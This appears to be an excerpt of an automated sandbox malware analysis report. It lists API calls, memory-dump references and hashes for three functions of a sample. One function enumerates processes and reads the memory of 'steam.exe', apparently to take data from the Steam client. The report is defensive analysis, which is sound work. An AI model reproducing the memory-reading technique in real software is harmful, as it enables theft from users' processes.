                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strtok_s
                                                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                                                      • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                      • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                      Function 00410050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                      • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: steam.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                      • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                      • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                      Function 0041D710 Relevance: 6.1, APIs: 4, Instructions: 82timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                      • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                      Function 004113B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69stringtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                                                      • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                                                      • Opcode ID: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                      • Instruction ID: 0ad9b0325b1aa92503a801a233b5e7783d800f0c675173fcafeea2b792c599d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F110330304200ABC704AB76A81667FB7A7EBC5304F45507EF442C73A1DE389C8087A5